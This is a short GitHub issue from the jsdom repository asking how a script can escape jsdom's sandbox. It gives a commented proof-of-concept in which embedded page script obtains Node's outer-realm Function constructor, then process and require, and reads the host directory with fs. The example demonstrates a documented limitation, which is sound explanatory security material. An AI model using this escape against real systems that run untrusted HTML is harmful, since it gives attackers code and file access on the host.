Jsdom: How can a script escape the sandbox?

Created on 30 Nov 2019 · 1 Comment · Source: jsdom/jsdom

The documentation states:

The jsdom sandbox is not foolproof, and code running inside the DOM's


Here is a small example that extracts the Function constructor from the Node.js environment.

const { JSDOM } = require("jsdom");

new JSDOM(`
<body>
  <script>
    // jsdom's Node interface is a function created in the outer (Node.js)
    // realm, so its .constructor is the outer realm's Function.
    const outerRealmFunctionConstructor = Node.constructor;
    // Code compiled by the outer Function runs in the outer global scope,
    // where `process` is defined.
    const process = new outerRealmFunctionConstructor("return process")();
    // process.mainModule is deprecated (DEP0138) but still present when the
    // entry point is a CommonJS module.
    const require = process.mainModule.require;

    // Game over!
    const fs = require('fs');
    console.log(fs.readdirSync('.'));
  </script>
</body>
`, {
  runScripts: "dangerously"
});